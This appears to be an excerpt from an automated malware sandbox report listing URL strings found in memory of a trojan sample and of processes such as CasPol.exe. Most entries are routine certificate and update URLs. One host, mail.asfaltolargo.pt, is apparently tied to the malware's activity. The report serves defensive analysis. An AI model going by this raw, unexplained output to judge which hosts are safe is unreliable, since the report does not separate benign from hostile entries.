Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0g
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ca.mtin.es/mtin/crl/MTINAutoridadRaiz03
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ca.mtin.es/mtin/ocsp0
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: NisSrv.exe.16.dr	String found in binary or memory: http://canonicalizer.ucsuri.tcs/68007400740070003a002f002f00https://F
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://certificates.starfieldtech.com/repository/1604
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://certs.oati.net/repository/OATICA2.crl0
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://certs.oati.net/repository/OATICA2.crt0
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crl
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crt08
Source: CasPol.exe, 00000005.00000003.18601003280.0000000020731000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: CasPol.exe, 00000005.00000002.23253044443.000000001F941000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23255549826.000000002079C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23245892965.000000001D994000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cps.letsencrypt.org0
Source: CasPol.exe, 00000005.00000002.23252711793.000000001F909000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23253044443.000000001F941000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23245892965.000000001D994000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cps.siths.se/sithsrootcav1.html0
Source: CasPol.exe, 00000005.00000003.18601003280.0000000020731000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18601324854.0000000020738000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
Source: CasPol.exe, 00000005.00000003.18601003280.0000000020731000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: CasPol.exe, 00000005.00000003.18459747894.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23220195823.0000000001389000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.19682976608.0000000020819000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18453568729.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000002.18817978834.000001F8CEA5A000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18808191584.000001F8CEA5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: CasPol.exe, 00000005.00000003.18602156620.0000000020831000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.defence.gov.au/pki0
Source: CasPol.exe, 00000005.00000003.18601003280.0000000020731000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18601324854.0000000020738000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl0
Source: CasPol.exe, 00000005.00000003.18459747894.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23220195823.0000000001389000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18453568729.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000002.18817978834.000001F8CEA5A000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18808191584.000001F8CEA5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: CasPol.exe, 00000005.00000002.23252711793.000000001F909000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23253044443.000000001F941000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23245892965.000000001D994000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: MpSigStub.exe, 00000013.00000003.18808585691.000001F8CEA95000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18809059455.000001F8CEAA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mV
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.oces.trust2408.com/oces.crl0
Source: CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
Source: CasPol.exe, 00000005.00000003.18601190951.000000002072C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
Source: CasPol.exe, 00000005.00000003.18600919578.0000000020866000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
Source: CasPol.exe, 00000005.00000003.18601003280.0000000020731000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.19682774918.000000002073F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18601324854.0000000020738000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
Source: CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.19682296383.0000000020824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: CasPol.exe, 00000005.00000003.18602156620.0000000020831000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: CasPol.exe, 00000005.00000002.23252207253.000000001F880000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en-
Source: CasPol.exe, 00000005.00000003.18600841922.000000002075C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23221121866.00000000013F5000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18600600714.0000000020744000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/CABD2A79A1076A31F21D253635CB0
Source: CasPol.exe, 00000005.00000002.23252207253.000000001F880000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabu
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://eca.hinet.net/repository/CRL2/CA.crl0
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://eca.hinet.net/repository/Certs/IssuedToThisCA.p7b05
Source: svchost.exe, 00000004.00000003.18264156503.0000016033E8D000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/ac4xvos2si2lmfknfcdjashelknq_6853/hfnkpim
Source: svchost.exe, 00000004.00000003.18264156503.0000016033E8D000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acawi27tahsqmjecluxobzvjkuqq_2696/jflookg
Source: edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/ad26pg2nrxgqly2ia5w7vo6eiqza_2021.9.7.114
Source: svchost.exe, 00000004.00000003.18264156503.0000016033E8D000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/b4fblichp2jogjdq2f6x2fndde_96.0.4642.0/96
Source: edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/ccqwc52cyybdcncouijnt6kpaq_2021.8.17.1300
Source: edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dvzedcdxjkqbllsukvc5xx3sla_297/lmelglejhe
Source: svchost.exe, 00000004.00000003.18264156503.0000016033E8D000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/eqxvmyahb2yb37zdb4o4kdupqe_20210908.39616
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
Source: CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
Source: CasPol.exe, 00000005.00000003.18602156620.0000000020831000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://http.fpki.gov/fcpca/caCertsIssuedByfcpca.p7c0
Source: CasPol.exe, 00000005.00000002.23245892965.000000001D994000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.asfaltolargo.pt
Source: CasPol.exe, 00000005.00000002.23245892965.000000001D994000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.asfaltolargo.pt(
Source: MpSigStub.exe, 00000013.00000003.18808585691.000001F8CEA95000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000002.18818438522.000001F8CEA95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://microsoft.co
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.accv.es0
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://ocsp.digicert.com0L
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.eca.hinet.net/OCSP/ocspG2sha20
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.ncdc.gov.sa0
Source: CasPol.exe, 00000005.00000003.18602026559.0000000020837000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.pki.gva.es0
Source: CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18601190951.000000002072C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.suscerte.gob.ve0
Source: svchost.exe, 0000001D.00000002.23220485437.000002C1682B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://passport.net/tb
Source: CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pki.digidentity.eu/validatie0
Source: CasPol.exe, 00000005.00000003.18600600714.0000000020744000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pki.registradores.org/normativa/index.htm0
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://policy.camerfirma.com0
Source: CasPol.exe, 00000005.00000003.18602026559.0000000020837000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://postsignum.ttc.cz/crl/psrootqca2.crl0
Source: CasPol.exe, 00000005.00000002.23253044443.000000001F941000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23255549826.000000002079C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23245892965.000000001D994000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.i.lencr.org/0-
Source: CasPol.exe, 00000005.00000002.23253044443.000000001F941000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23255549826.000000002079C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.23245892965.000000001D994000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: svchost.exe, 00000004.00000003.18263630598.0000016033E3A000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.dr	String found in binary or memory: http://r4---sn-4g5edn6r.gvt1.com/edgedl/release2/chrome/m7rvnjoy2l3r3o6gis4j26t4ii_93.0.4577.63/93.0
Source: svchost.exe, 00000004.00000003.18264715234.0000016033EF8000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.dr	String found in binary or memory: http://r4---sn-5hnekn7k.gvt1.com/edgedl/release2/chrome/acb3kitere6jimdp6rrtasanb2aq_93.0.4577.82/93
Source: edb.log.4.dr	String found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvODZmQUFYS2VOaGowdjd
Source: edb.log.4.dr	String found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome/acb3kitere6jimdp6rrtasanb2aq_93.0.4577.82/93.0.457
Source: edb.log.4.dr	String found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome/m7rvnjoy2l3r3o6gis4j26t4ii_93.0.4577.63/93.0.4577.
Source: edb.log.4.dr	String found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome_component/aciwgjnovhktokhzyboslawih45a_2700/jflook
Source: edb.log.4.dr	String found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome_component/acze3h5f67uhtnjsyv6pabzn277q_298/lmelgle
Source: svchost.exe, 00000004.00000003.18264499048.0000016033ECF000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.dr	String found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome_component/dp66roauucji6olf7ycwe24lea_6869/hfnkpiml
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.19682976608.0000000020819000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18602026559.0000000020837000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://repository.swisssign.com/0
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://s2.symcb.com0
Source: MpSigStub.exe, 00000013.00000003.18771865855.000001F8CDE46000.00000004.00000020.00020000.00000000.sdmp, MpSigStub.exe, 00000013.00000003.18771022833.000001F8CDE35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.mic2M
Source: MpSigStub.exe, 00000013.00000003.18752568256.000001F8CDE3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: CasPol.exe, 00000005.00000003.19682976608.0000000020819000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
Source: edb.log.4.dr	String found in binary or memory: http://storage.googleapis.com/update-delta/ggkkehgbnfjpeggfpleeakpidbkibbmn/2021.9.13.1142/2021.9.7.
Source: edb.log.4.dr	String found in binary or memory: http://storage.googleapis.com/update-delta/gkmgaooipdjhmangpemjhigmamcehddo/93.269.200/92.267.200/17
Source: svchost.exe, 00000004.00000003.18264499048.0000016033ECF000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.dr	String found in binary or memory: http://storage.googleapis.com/update-delta/jamhcnnkihinmdlkakkaopbjbbcngflc/96.0.4648.2/96.0.4642.0/
Source: edb.log.4.dr	String found in binary or memory: http://storage.googleapis.com/update-delta/khaoiebndkojlmppeemjhbpbandiljpe/45/43/19f2dc8e4c5c5d0383
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://sv.symcd.com0&
Source: CasPol.exe, 00000005.00000003.18602026559.0000000020837000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://web.ncdc.gov.sa/crl/nrcacomb1.crl0
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://web.ncdc.gov.sa/crl/nrcaparta1.crl
Source: CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.acabogacia.org/doc0
Source: CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.acabogacia.org0
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es00
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.agesic.gub.uy/acrn/acrn.crl0)
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.agesic.gub.uy/acrn/cps_acrn.pdf0
Source: CasPol.exe, 00000005.00000003.18600600714.0000000020744000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.ancert.com/cps0
Source: CasPol.exe, 00000005.00000003.18601505288.000000002083F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.anf.es
Source: CasPol.exe, 00000005.00000003.19682976608.0000000020819000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.18599518207.00000000207A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.anf.es/AC/RC/ocsp0c
